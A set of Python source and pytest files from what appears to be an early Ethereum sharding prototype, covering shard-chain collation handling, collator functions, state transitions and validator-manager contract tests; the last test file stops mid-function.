log.info('Collation %s with parent %s invalid, reason: %s' %
(encode_hex(collation.header.hash), encode_hex(collation.header.parent_collation_hash), str(e)))
return False
collation_score = self.get_score(collation)
log.info('collation_score of {} is {}'.format(encode_hex(collation.header.hash), collation_score))
# Collation has no parent yet
else:
log.info(
'Receiving collation(%s) which its parent is NOT in db: %s' %
(encode_hex(collation.header.hash), encode_hex(collation.header.parent_collation_hash)))
if collation.header.parent_collation_hash not in self.parent_queue:
self.parent_queue[collation.header.parent_collation_hash] = []
self.parent_queue[collation.header.parent_collation_hash].append(collation)
log.info('No parent found. Delaying for now')
return False
self.db.put(collation.header.hash, rlp.encode(collation))
# TODO: Delete old junk data
# deletes, changed
self.db.commit()
log.info(
'Added collation (%s) with %d txs' %
(encode_hex(collation.header.hash)[:8],
len(collation.transactions)))
# Call optional callback
if self.new_head_cb and self.is_first_collation(collation):
self.new_head_cb(collation)
# TODO: It seems weird to use callback function to access member of MainChain
try:
handle_orphan_collation(collation)
except Exception as e:
log.info('handle_orphan_collation exception: {}'.format(str(e)))
return False
return True
def mk_poststate_of_collation_hash(self, collation_hash):
"""Return the post-state of the collation
"""
if collation_hash not in self.db:
raise Exception("Collation hash %s not found" % encode_hex(collation_hash))
collation_rlp = self.db.get(collation_hash)
if collation_rlp == 'GENESIS':
return State.from_snapshot(json.loads(self.db.get('GENESIS_STATE')), self.env)
collation = rlp.decode(collation_rlp, Collation)
state = State(env=self.env)
state.trie.root_hash = collation.header.post_state_root
update_collation_env_variables(state, collation)
state.gas_used = 0
state.txindex = len(collation.transactions)
state.recent_uncles = {}
state.prev_headers = []
assert len(state.journal) == 0, state.journal
return state
def get_parent(self, collation):
"""Get the parent collation of a given collation
"""
if self.is_first_collation(collation):
return None
return self.get_collation(collation.header.parent_collation_hash)
def get_collation(self, collation_hash):
"""Get the collation with a given collation hash
"""
try:
collation_rlp = self.db.get(collation_hash)
if collation_rlp == 'GENESIS':
return Collation(CollationHeader())
# if not hasattr(self, 'genesis'):
# self.genesis = rlp.decode(self.db.get('GENESIS_RLP'), sedes=Block)
# return self.genesis
else:
return rlp.decode(collation_rlp, Collation)
except Exception as e:
log.debug("Failed to get collation", hash=encode_hex(collation_hash), error=str(e))
return None
def get_score(self, collation):
"""Get the score of a given collation
"""
score = 0
if not collation:
return 0
key = b'score:' + collation.header.hash
fills = []
while key not in self.db and collation is not None:
fills.insert(0, collation.header.hash)
key = b'score:' + collation.header.parent_collation_hash
collation = self.get_parent(collation)
score = int(self.db.get(key))
log.debug('int(self.db.get(key)):{}'.format(int(self.db.get(key))))
for h in fills:
key = b'score:' + h
score += 1
self.db.put(key, str(score))
return score
def is_first_collation(self, collation):
"""Check if the given collation is the first collation of this shard
"""
return collation.header.parent_collation_hash == self.env.config['GENESIS_PREVHASH']
# TODO: test
def get_head_collation(self, blockhash):
"""Get head collation
"""
collation = None
if blockhash in self.head_collation_of_block:
collhash = self.head_collation_of_block[blockhash]
else:
log.info('head_collation_of_block[%s] is not found' % encode_hex(blockhash))
return None
try:
collation = self.get_collation(collhash)
except KeyError as e:
log.info(
'Collation (%s) with blockhash %s invalid, reason: %s' %
(encode_hex(collhash), encode_hex(blockhash), str(e)))
return None
return collation
--- FILE SEPARATOR ---
import pytest
from ethereum.transaction_queue import TransactionQueue
from ethereum import utils
from ethereum import trie
from sharding import collator
from sharding.tools import tester
@pytest.fixture(scope='function')
def chain(shardId):
t = tester.Chain(env='sharding')
t.add_test_shard(shardId)
t.mine(5)
return t
def test_create_collation_empty_txqueue():
"""Test create_collation without transactions
"""
shardId = 1
t = chain(shardId)
prev_collation_hash = t.chain.shards[shardId].head_hash
expected_period_number = t.chain.get_expected_period_number()
txqueue = TransactionQueue()
collation = collator.create_collation(
t.chain,
shardId,
prev_collation_hash,
expected_period_number,
coinbase=tester.a1,
key=tester.k1,
txqueue=txqueue)
assert collation.transaction_count == 0
assert collation.header.coinbase == tester.a1
def test_create_collation_with_txs():
"""Test create_collation with transactions
"""
shardId = 1
t = chain(shardId)
prev_collation_hash = t.chain.shards[shardId].head_hash
expected_period_number = t.chain.get_expected_period_number()
txqueue = TransactionQueue()
tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
tx2 = t.generate_shard_tx(tester.k3, tester.a5, int(0.03 * utils.denoms.ether))
txqueue.add_transaction(tx1)
txqueue.add_transaction(tx2)
collation = collator.create_collation(
t.chain,
shardId,
prev_collation_hash,
expected_period_number,
coinbase=tester.a1,
key=tester.k1,
txqueue=txqueue)
assert collation.transaction_count == 2
def test_apply_collation():
"""Apply collation to ShardChain
"""
shardId = 1
t = chain(shardId)
txqueue = TransactionQueue()
tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
tx2 = t.generate_shard_tx(tester.k3, tester.a5, int(0.03 * utils.denoms.ether))
txqueue.add_transaction(tx1)
txqueue.add_transaction(tx2)
state = t.chain.shards[shardId].state
prev_state_root = state.trie.root_hash
collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=txqueue)
period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
collator.apply_collation(state, collation, period_start_prevblock)
assert state.trie.root_hash != prev_state_root
assert collation.header.post_state_root == state.trie.root_hash
assert collation.header.post_state_root == t.chain.shards[shardId].state.trie.root_hash
def test_apply_collation_wrong_root():
"""Test apply_collation with wrong roots in header
test verify_execution_results
"""
shardId = 1
t = chain(shardId)
# test 1 - arrange
state = t.chain.shards[shardId].state
txqueue = TransactionQueue()
tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
txqueue.add_transaction(tx1)
# post_state_root
collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=txqueue)
period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
# Set wrong root
collation.header.post_state_root = trie.BLANK_ROOT
with pytest.raises(ValueError):
collator.apply_collation(state, collation, period_start_prevblock)
# test 2 - arrange
state = t.chain.shards[shardId].state
txqueue = TransactionQueue()
tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
txqueue.add_transaction(tx1)
# receipts_root
collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=txqueue)
period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
# Set wrong root
collation.header.receipts_root = trie.BLANK_ROOT
with pytest.raises(ValueError):
collator.apply_collation(state, collation, period_start_prevblock)
# test 3 - arrange
state = t.chain.shards[shardId].state
txqueue = TransactionQueue()
tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
txqueue.add_transaction(tx1)
# receipts_root
collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=txqueue)
period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
# Set wrong root
collation.header.tx_list_root = trie.BLANK_ROOT
with pytest.raises(ValueError):
collator.apply_collation(state, collation, period_start_prevblock)
--- FILE SEPARATOR ---
import pytest
import logging
from ethereum.slogging import get_logger
from sharding.tools import tester
from sharding.shard_chain import ShardChain
log = get_logger('test.shard_chain')
log.setLevel(logging.DEBUG)
@pytest.fixture(scope='function')
def chain(shardId):
t = tester.Chain(env='sharding')
t.add_test_shard(shardId)
t.mine(5)
return t
def test_init_shard():
"""Test init_shard(self, shardId)
"""
t = tester.Chain(env='sharding')
assert t.chain.init_shard(1)
assert len(t.chain.shard_id_list) == 1
assert t.chain.init_shard(2)
assert len(t.chain.shard_id_list) == 2
assert not t.chain.init_shard(2)
assert len(t.chain.shard_id_list) == 2
def test_add_shard():
"""Test add_shard(self, shard)
"""
shardId = 1
t = tester.Chain(env='sharding')
shard = ShardChain(shardId=shardId)
assert t.chain.add_shard(shard)
assert len(t.chain.shard_id_list) == 1
assert not t.chain.add_shard(shard)
def test_get_expected_period_number():
"""Test get_expected_period_number(self)
"""
shardId = 1
t = tester.Chain(env='sharding')
t.chain.init_shard(shardId)
t.mine(5) # block number = 5
assert t.chain.get_expected_period_number() == 1
t.mine(4) # block number = 9
assert t.chain.get_expected_period_number() == 2
t.mine(1) # block number = 10
assert t.chain.get_expected_period_number() == 2
def test_get_period_start_prevhash():
"""Test get_period_start_prevhash(self, expected_period_number)
"""
shardId = 1
t = tester.Chain(env='sharding')
t.chain.init_shard(shardId)
t.mine(5)
expected_period_number = 1
assert t.chain.get_period_start_prevhash(expected_period_number)
expected_period_number = 2
assert t.chain.get_period_start_prevhash(expected_period_number) is None
def test_handle_orphan_collation():
"""Test handle_orphan_collation(self, collation, period_start_prevblock, handle_orphan_collation)
"""
shardId = 1
# Collator: create and apply collation sequentially
t1 = tester.Chain(env='sharding')
t1.chain.init_shard(shardId)
t1.mine(5)
# collation1
collation1 = t1.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=None)
period_start_prevblock = t1.chain.get_block(collation1.header.period_start_prevhash)
t1.chain.shards[shardId].add_collation(collation1, period_start_prevblock, t1.chain.handle_orphan_collation)
assert t1.chain.shards[shardId].get_score(collation1) == 1
# collation2
collation2 = t1.generate_collation(shardId=1, coinbase=tester.a2, key=tester.k2, txqueue=None, prev_collation_hash=collation1.header.hash)
period_start_prevblock = t1.chain.get_block(collation2.header.period_start_prevhash)
t1.chain.shards[shardId].add_collation(collation2, period_start_prevblock, t1.chain.handle_orphan_collation)
assert t1.chain.shards[shardId].get_score(collation2) == 2
# collation3
collation3 = t1.generate_collation(shardId=1, coinbase=tester.a2, key=tester.k2, txqueue=None, prev_collation_hash=collation2.header.hash)
period_start_prevblock = t1.chain.get_block(collation3.header.period_start_prevhash)
t1.chain.shards[shardId].add_collation(collation3, period_start_prevblock, t1.chain.handle_orphan_collation)
assert t1.chain.shards[shardId].get_score(collation3) == 3
# Validator: apply collation2, collation3 and collation1
t2 = tester.Chain(env='sharding')
t2.chain.init_shard(shardId)
t2.mine(5)
# append collation2
t2.chain.shards[shardId].add_collation(collation2, period_start_prevblock, t2.chain.handle_orphan_collation)
# append collation3
t2.chain.shards[shardId].add_collation(collation3, period_start_prevblock, t2.chain.handle_orphan_collation)
# append collation1 now
t2.chain.shards[shardId].add_collation(collation1, period_start_prevblock, t2.chain.handle_orphan_collation)
assert t2.chain.shards[shardId].get_score(collation1) == 1
assert t2.chain.shards[shardId].get_score(collation2) == 2
assert t2.chain.shards[shardId].get_score(collation3) == 3
--- FILE SEPARATOR ---
import pytest
import logging
from ethereum.utils import encode_hex
from ethereum.slogging import get_logger
from ethereum.transaction_queue import TransactionQueue
from ethereum import utils
from sharding.tools import tester
log = get_logger('test.shard_chain')
log.setLevel(logging.DEBUG)
@pytest.fixture(scope='function')
def chain(shardId):
t = tester.Chain(env='sharding')
t.add_test_shard(shardId)
t.mine(5)
return t
def test_add_collation():
"""Test add_collation(self, collation, period_start_prevblock, handle_orphan_collation)
"""
shardId = 1
t = tester.Chain(env='sharding')
t.chain.init_shard(shardId)
t.mine(5)
log.info('head_state: {}'.format(t.chain.shards[shardId].state.trie.root_hash))
log.info('block_number: {}'.format(t.chain.shards[shardId].state.block_number))
# parent = empty
collation1 = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=None)
period_start_prevblock = t.chain.get_block(collation1.header.period_start_prevhash)
t.chain.shards[shardId].add_collation(collation1, period_start_prevblock, t.chain.handle_orphan_collation)
assert t.chain.shards[shardId].get_score(collation1) == 1
# parent = empty
collation2 = t.generate_collation(shardId=1, coinbase=tester.a2, key=tester.k1, txqueue=None)
period_start_prevblock = t.chain.get_block(collation2.header.period_start_prevhash)
t.chain.shards[shardId].add_collation(collation2, period_start_prevblock, t.chain.handle_orphan_collation)
assert t.chain.shards[shardId].get_score(collation2) == 1
# parent = collation1
collation3 = t.generate_collation(shardId=1, coinbase=tester.a2, key=tester.k1, txqueue=None, prev_collation_hash=collation1.header.hash)
period_start_prevblock = t.chain.get_block(collation3.header.period_start_prevhash)
t.chain.shards[shardId].add_collation(collation3, period_start_prevblock, t.chain.handle_orphan_collation)
assert t.chain.shards[shardId].get_score(collation3) == 2
# parent = collation3
collation4 = t.generate_collation(shardId=1, coinbase=tester.a2, key=tester.k1, txqueue=None, prev_collation_hash=collation3.header.hash)
period_start_prevblock = t.chain.get_block(collation4.header.period_start_prevhash)
t.chain.shards[shardId].add_collation(collation4, period_start_prevblock, t.chain.handle_orphan_collation)
assert t.chain.shards[shardId].get_score(collation4) == 3
def test_handle_orphan_collation():
"""Test handle_orphan_collation(self, collation, period_start_prevblock, handle_orphan_collation)
"""
shardId = 1
# Collator: create and apply collation sequentially
t1 = tester.Chain(env='sharding')
t1.chain.init_shard(shardId)
t1.mine(5)
# collation1
collation1 = t1.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=None)
period_start_prevblock = t1.chain.get_block(collation1.header.period_start_prevhash)
t1.chain.shards[shardId].add_collation(collation1, period_start_prevblock, t1.chain.handle_orphan_collation)
assert t1.chain.shards[shardId].get_score(collation1) == 1
# collation2
collation2 = t1.generate_collation(shardId=1, coinbase=tester.a2, key=tester.k2, txqueue=None, prev_collation_hash=collation1.header.hash)
period_start_prevblock = t1.chain.get_block(collation2.header.period_start_prevhash)
t1.chain.shards[shardId].add_collation(collation2, period_start_prevblock, t1.chain.handle_orphan_collation)
assert t1.chain.shards[shardId].get_score(collation2) == 2
# collation3
collation3 = t1.generate_collation(shardId=1, coinbase=tester.a2, key=tester.k2, txqueue=None, prev_collation_hash=collation2.header.hash)
period_start_prevblock = t1.chain.get_block(collation3.header.period_start_prevhash)
t1.chain.shards[shardId].add_collation(collation3, period_start_prevblock, t1.chain.handle_orphan_collation)
assert t1.chain.shards[shardId].get_score(collation3) == 3
# Validator: apply collation2, collation3 and collation1
t2 = tester.Chain(env='sharding')
t2.chain.init_shard(shardId)
t2.mine(5)
# append collation2
t2.chain.shards[shardId].add_collation(collation2, period_start_prevblock, t2.chain.handle_orphan_collation)
# append collation3
t2.chain.shards[shardId].add_collation(collation3, period_start_prevblock, t2.chain.handle_orphan_collation)
# append collation1 now
t2.chain.shards[shardId].add_collation(collation1, period_start_prevblock, t2.chain.handle_orphan_collation)
assert t2.chain.shards[shardId].get_score(collation1) == 1
assert t2.chain.shards[shardId].get_score(collation2) == 2
assert t2.chain.shards[shardId].get_score(collation3) == 3
def test_transaction():
"""Test create and apply collation with transactions
"""
shardId = 1
t = chain(shardId)
log.info('head state: {}'.format(encode_hex(t.chain.shards[shardId].state.trie.root_hash)))
tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
tx2 = t.generate_shard_tx(tester.k3, tester.a5, int(0.03 * utils.denoms.ether))
# Prepare txqueue
txqueue = TransactionQueue()
txqueue.add_transaction(tx1)
txqueue.add_transaction(tx2)
collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=txqueue)
log.debug('collation: {}, transaction_count:{}'.format(collation.to_dict(), collation.transaction_count))
period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
log.debug('period_start_prevblock: {}'.format(encode_hex(period_start_prevblock.header.hash)))
t.chain.shards[shardId].add_collation(collation, period_start_prevblock, t.chain.handle_orphan_collation)
state = t.chain.shards[shardId].mk_poststate_of_collation_hash(collation.header.hash)
# Check to addesss received value
assert state.get_balance(tester.a4) == 1030000000000000000
# Check incentives
assert state.get_balance(tester.a1) == 1002000000000000000
def test_get_collation():
"""Test get_parent(self, collation)
"""
shardId = 1
t = tester.Chain(env='sharding')
t.chain.init_shard(shardId)
t.mine(5)
collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=None)
period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
t.chain.shards[shardId].add_collation(collation, period_start_prevblock, t.chain.handle_orphan_collation)
assert t.chain.shards[shardId].get_collation(collation.header.hash).header.hash == collation.header.hash
def test_get_parent():
"""Test get_parent(self, collation)
"""
t = tester.Chain(env='sharding')
shardId = 1
t.chain.init_shard(shardId)
t.mine(5)
collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=None)
period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
t.chain.shards[shardId].add_collation(collation, period_start_prevblock, t.chain.handle_orphan_collation)
assert t.chain.shards[shardId].is_first_collation(collation)
# append to previous collation
collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=None, prev_collation_hash=collation.header.hash)
period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
t.chain.shards[shardId].add_collation(collation, period_start_prevblock, t.chain.handle_orphan_collation)
assert not t.chain.shards[shardId].is_first_collation(collation)
assert t.chain.shards[shardId].get_parent(collation).header.hash == collation.header.parent_collation_hash
# TODO: after add_block
# def test_get_head_collation():
# """Test get_head_collation(blockhash)
# """
# shardId = 1
# t = chain(shardId)
# tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
# txqueue = TransactionQueue()
# txqueue.add_transaction(tx1)
# collation = t.generate_collation(shardId=1, coinbase=tester.a1, txqueue=txqueue)
# period_start_prevblock = t.chain.get_block(collation.header.period_start_prevhash)
# t.chain.shards[shardId].add_collation(collation, period_start_prevblock, t.chain.handle_orphan_collation)
# log.info('state: {}'.format(encode_hex(t.chain.shards[shardId].state.trie.root_hash)))
# blockhash = t.chain.head_hash
# # print('head_collation: %s' % encode_hex(t.chain.shards[shardId].get_head_collation(blockhash).header.hash))
# assert t.chain.shards[shardId].get_head_collation(blockhash) is not None
--- FILE SEPARATOR ---
import pytest
import logging
from ethereum.state import State
from ethereum.transaction_queue import TransactionQueue
from ethereum import utils
from ethereum.slogging import get_logger
from ethereum.common import mk_transaction_sha, mk_receipt_sha
from ethereum import trie
from sharding.collation import Collation, CollationHeader
from sharding import state_transition
from sharding.tools import tester
log = get_logger('test.shard_chain')
log.setLevel(logging.DEBUG)
shardId = 1
@pytest.fixture(scope='function')
def chain(shardId):
t = tester.Chain(env='sharding')
t.add_test_shard(shardId)
t.mine(5)
return t
def test_mk_collation_from_prevstate():
"""Test mk_collation_from_prevstate(shard_chain, state, coinbase)
"""
t = chain(shardId)
coinbase = tester.a1
state = t.chain.shards[shardId].state
collation = state_transition.mk_collation_from_prevstate(t.chain.shards[shardId], state, coinbase)
assert collation.hash is not None
assert collation.header.shardId == 1
assert collation.header.prev_state_root == state.trie.root_hash
assert collation.header.coinbase == coinbase
assert not collation.transactions
def test_add_transactions():
"""Test add_transactions(state, collation, txqueue, min_gasprice=0)
"""
t = chain(shardId)
tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
tx2 = t.generate_shard_tx(tester.k3, tester.a5, int(0.03 * utils.denoms.ether))
txqueue = TransactionQueue()
txqueue.add_transaction(tx1)
txqueue.add_transaction(tx2)
coinbase = tester.a1
state = t.chain.shards[shardId].state.ephemeral_clone()
collation = state_transition.mk_collation_from_prevstate(t.chain.shards[shardId], state, coinbase)
state_transition.add_transactions(state, collation, txqueue)
assert collation.transaction_count == 2
assert state.get_balance(tester.a4) == 1 * utils.denoms.ether + int(0.03 * utils.denoms.ether)
def test_update_collation_env_variables():
"""Test update_collation_env_variables(state, collation)
"""
collation = Collation(CollationHeader(coinbase=tester.a2))
state = State()
state_transition.update_collation_env_variables(state, collation)
assert state.block_coinbase == tester.a2
def test_set_execution_results():
"""Test set_execution_results(state, collation)
"""
collation = Collation(CollationHeader(coinbase=tester.a2))
state = State()
state_transition.set_execution_results(state, collation)
assert collation.header.receipts_root == mk_receipt_sha(state.receipts)
assert collation.header.tx_list_root == mk_transaction_sha(collation.transactions)
assert collation.header.post_state_root == state.trie.root_hash
def test_validate_transaction_tree():
"""Test validate_transaction_tree(collation)
"""
t = chain(shardId)
tx1 = t.generate_shard_tx(tester.k2, tester.a4, int(0.03 * utils.denoms.ether))
tx2 = t.generate_shard_tx(tester.k3, tester.a5, int(0.03 * utils.denoms.ether))
txqueue = TransactionQueue()
txqueue.add_transaction(tx1)
txqueue.add_transaction(tx2)
collation = t.generate_collation(shardId=1, coinbase=tester.a1, key=tester.k1, txqueue=txqueue)
assert state_transition.validate_transaction_tree(collation)
collation.header.tx_list_root = trie.BLANK_ROOT
with pytest.raises(ValueError):
state_transition.validate_transaction_tree(collation)
def test_finalize():
"""Test finalize(state, coinbase)
"""
coinbase = '\x35'*20
t = chain(shardId)
state = t.chain.shards[shardId].state
state_transition.finalize(state, coinbase)
assert state.get_balance(coinbase) == int(state.config['COLLATOR_REWARD'])
--- FILE SEPARATOR ---
import pytest
import rlp
from ethereum import utils
from ethereum.slogging import LogRecorder, configure_logging, set_level
from sharding.tools import tester as t
from ethereum.transactions import Transaction
from rlp.sedes import List, binary
from sharding.validator_manager_utils import (get_valmgr_addr,
get_valmgr_ct,
get_valmgr_code,
mk_initiating_contracts,
mk_validation_code, sighasher_tx,
sign, viper_rlp_decoder_tx)
config_string = ":info,:debug"
'''
from ethereum.slogging import LogRecorder, configure_logging, set_level
config_string = ':info,eth.vm.log:trace,eth.vm.op:trace,eth.vm.stack:trace,eth.vm.exit:trace,eth.pb.msg:trace,eth.pb.tx:debug'
configure_logging(config_string=config_string)
'''
validator_manager_code = get_valmgr_code()
def test_validator_manager():
# Must pay 100 ETH to become a validator
deposit_size = 10 ** 20
withdraw_msg_hash = utils.sha3("withdraw")
c = t.Chain()
k0_valcode_addr = c.tx(t.k0, '', 0, mk_validation_code(t.a0))
k1_valcode_addr = c.tx(t.k1, '', 0, mk_validation_code(t.a1))
num_blocks = 11
c.mine(num_blocks - 1, coinbase=t.a0)
c.head_state.gas_limit = 10 ** 12
c.head_state.set_balance(address=t.a0, value=deposit_size * 10)
c.head_state.set_balance(address=t.a1, value=deposit_size * 10)
# deploy valmgr and its prerequisite contracts and transactions
txs = mk_initiating_contracts(t.k0, c.head_state.get_nonce(t.a0))
for tx in txs:
try:
c.direct_tx(tx)
except t.TransactionFailed:
pass
x = t.ABIContract(c, get_valmgr_ct(), get_valmgr_addr())
# test deposit: fails when msg.value != deposit_size
with pytest.raises(t.TransactionFailed):
x.deposit(k0_valcode_addr, k0_valcode_addr)
# test withdraw: fails when no validator record
assert not x.withdraw(0, sign(withdraw_msg_hash, t.k0))
# test deposit: works fine
return_addr = utils.privtoaddr(utils.sha3("return_addr"))
assert 0 == x.deposit(k0_valcode_addr, return_addr, value=deposit_size, sender=t.k0)
assert 1 == x.deposit(k1_valcode_addr, return_addr, value=deposit_size, sender=t.k1)
assert x.withdraw(0, sign(withdraw_msg_hash, t.k0))
# test withdraw: see if the money is returned
assert c.head_state.get_balance(return_addr) == deposit_size
# test deposit: make use of empty slots
assert 0 == x.deposit(k0_valcode_addr, return_addr, value=deposit_size, sender=t.k0)
assert x.withdraw(1, sign(withdraw_msg_hash, t.k1))
# test deposit: working fine in the edge condition
assert 1 == x.deposit(k1_valcode_addr, return_addr, value=deposit_size, sender=t.k1)
# test deposit: fails when valcode_addr is deposited before
with pytest.raises(t.TransactionFailed):
x.deposit(k1_valcode_addr, return_addr, value=deposit_size, sender=t.k1)
# test withdraw: fails when the signature is not corret
assert not x.withdraw(1, sign(withdraw_msg_hash, t.k0))
# test sample: correctly sample the only one validator
assert x.withdraw(0, sign(withdraw_msg_hash, t.k0))
assert x.sample(0) == hex(utils.big_endian_to_int(k1_valcode_addr))
# test sample: sample returns zero_addr (i.e. 0x00) when there is no depositing validator
assert x.withdraw(1, sign(withdraw_msg_hash, t.k1))
assert x.sample(0) == "0x0000000000000000000000000000000000000000"
assert 1 == x.deposit(k0_valcode_addr, return_addr, value=deposit_size, sender=t.k0)
def get_colhdr(shard_id, parent_collation_hash, collation_coinbase=t.a0):
period_length = 5
expected_period_number = num_blocks // period_length
b = c.chain.get_block_by_number(expected_period_number * period_length - 1)
period_start_prevhash = b.header.hash
tx_list_root = b"tx_list " * 4
post_state_root = b"post_sta" * 4
receipt_root = b"receipt " * 4
sighash = utils.sha3(
rlp.encode([
shard_id, expected_period_number, period_start_prevhash,
parent_collation_hash, tx_list_root, collation_coinbase,
post_state_root, receipt_root
])
)
sig = sign(sighash, t.k0)
return rlp.encode([
shard_id, expected_period_number, period_start_prevhash,
parent_collation_hash, tx_list_root, collation_coinbase,
post_state_root, receipt_root, sig
])
header_logs = []
add_header_topic = utils.big_endian_to_int(utils.sha3("add_header()"))
def header_event_watcher(log):
header_logs, add_header_topic
# print the last log and store the recent received one
if log.topics[0] == add_header_topic:
# print(log.data)
header_logs.append(log.data)
if len(header_logs) > 1:
last_log = header_logs.pop(0)
# [num, num, bytes32, bytes32, bytes32, address, bytes32, bytes32, bytes]
# use sedes to prevent integer 0 from being decoded as b''
sedes = List([utils.big_endian_int, utils.big_endian_int, utils.hash32, utils.hash32, utils.hash32, utils.address, utils.hash32, utils.hash32, binary])
values = rlp.decode(last_log, sedes)
print("add_header: shard_id={}, expected_period_number={}, header_hash={}, parent_header_hash={}".format(values[0], values[1], utils.sha3(last_log), values[3]))
c.head_state.log_listeners.append(header_event_watcher)
shard_id = 0
shard0_genesis_colhdr_hash = utils.encode_int32(0)
# test get_shard_head: returns genesis_colhdr_hash when there is no new header
assert x.get_shard_head() == shard0_genesis_colhdr_hash
# test add_header: works normally with parent_collation_hash == GENESIS
h1 = get_colhdr(shard_id, shard0_genesis_colhdr_hash)
h1_hash = utils.sha3(h1)
assert x.add_header(h1)
# test add_header: fails when the header is added before
with pytest.raises(t.TransactionFailed):
h1 = get_colhdr(shard_id, shard0_genesis_colhdr_hash)
result = x.add_header(h1)
# test add_header: fails when the parent_collation_hash is not added before
with pytest.raises(t.TransactionFailed):
h2 = get_colhdr(shard_id, utils.sha3("123"))
result = x.add_header(h2)
# test add_header: the log is generated normally
h2 = get_colhdr(shard_id, h1_hash)
h2_hash = utils.sha3(h2)
assert x.add_header(h2)
latest_log_hash = utils.sha3(header_logs[-1])
assert h2_hash == latest_log_hash
# test get_shard_head: get the correct head when a new header is added
assert x.get_shard_head(0) == h2_hash
# test get_shard_head: get the correct head when a fork happened
h1_prime = get_colhdr(shard_id, shard0_genesis_colhdr_hash, collation_coinbase=t.a1)
h1_prime_hash = utils.sha3(h1_prime)
assert x.add_header(h1_prime)
h2_prime = get_colhdr(shard_id, h1_prime_hash, collation_coinbase=t.a1)
h2_prime_hash = utils.sha3(h2_prime)
assert x.add_header(h2_prime)
assert x.get_shard_head(0) == h2_hash
h3_prime = get_colhdr(shard_id, h2_prime_hash, collation_coinbase=t.a1)
h3_prime_hash = utils.sha3(h3_prime)
assert x.add_header(h3_prime)
assert x.get_shard_head(0) == h3_prime_hash
'''
# test get_ancestor: h3_prime's height is too low so and it doesn't have a
# 10000th ancestor. So it should fail.
with pytest.raises(t.TransactionFailed):
ancestor_10000th_hash = x.get_ancestor(shard_id, h3_prime_hash)
# test get_ancestor:
# TODO: figure out a better test instead of adding headers one by one.
# This test takes few minutes. For now, you can adjust the `kth_ancestor`
# to a smaller number here, and the same number of iterations of the `for`
# loop in `get_ancestor` in the validator_manager contract.
current_height = 3 # h3_prime
kth_ancestor = 10000
current_colhdr_hash = h3_prime_hash
# add (kth_ancestor - current_height) headers to get the genesis as the ancestor
for i in range(kth_ancestor - current_height):
current_colhdr = get_colhdr(shard_id, current_colhdr_hash, collation_coinbase=t.a1)
assert x.add_header(current_colhdr)
current_colhdr_hash = utils.sha3(current_colhdr)
assert x.get_ancestor(shard_id, current_colhdr_hash) == shard0_genesis_colhdr_hash
'''
--- FILE SEPARATOR ---
import pytest
import rlp
from ethereum import utils
from ethereum.messages import apply_transaction
from ethereum.transactions import Transaction
from sharding.config import sharding_config
from sharding.tools import tester as t
from sharding.validator_manager_utils import (GASPRICE, STARTGAS, call_deposit,
call_sample,
call_validation_code,
call_withdraw, call_add_header,
call_get_shard_head,
call_get_collation_gas_limit,
get_valmgr_addr,
mk_initiating_contracts,
mk_validation_code, sign)
deposit_size = 10 ** 20
withdraw_hash = utils.sha3("withdraw")
config_string = ":info,:debug"
'''
from ethereum.slogging import LogRecorder, configure_logging, set_level
config_string = ':info,eth.vm.log:trace,eth.vm.op:trace,eth.vm.stack:trace,eth.vm.exit:trace,eth.pb.msg:trace,eth.pb.tx:debug'
configure_logging(config_string=config_string)
'''
# Testing Part
def deploy_tx(state, tx):
success, output = apply_transaction(state, tx)
if not success:
raise t.TransactionFailed("Failed to deploy tx")
return output
def deploy_contract(state, sender_privkey, bytecode):
tx = Transaction(
state.get_nonce(utils.privtoaddr(sender_privkey)),
GASPRICE, STARTGAS, to=b'', value=0,
data=bytecode
).sign(sender_privkey)
return deploy_tx(state, tx)
def deploy_initializing_contracts(sender_privkey, state):
sender_addr = utils.privtoaddr(sender_privkey)
txs = mk_initiating_contracts(sender_privkey, state.get_nonce(sender_addr))
for tx in txs:
try:
deploy_tx(state, tx)
except t.TransactionFailed:
pass
num_blocks = 6
@pytest.fixture
def chain():
"""A initialized chain from ethereum.tester.Chain
"""
c = t.Chain()
c.mine(num_blocks - 1, coinbase=t.a0)
c.head_state.gas_limit = 10 ** 12
c.head_state.set_balance(address=t.a0, value=deposit_size * 10)
c.head_state.set_balance(address=t.a1, value=deposit_size * 10)
deploy_initializing_contracts(t.k0, c.head_state)
return c
def test_call_deposit_withdraw_sample(chain):
state = chain.head_state
k0_valcode_addr = deploy_contract(state, t.k0, mk_validation_code(t.a0))
tx = call_deposit(state, t.k0, deposit_size, k0_valcode_addr, t.a2)
deploy_tx(state, tx)
assert hex(utils.big_endian_to_int(k0_valcode_addr)) == \
hex(utils.big_endian_to_int(call_sample(state, 0)))
tx = call_withdraw(state, t.k0, 0, 0, sign(withdraw_hash, t.k0))
deploy_tx(state, tx)
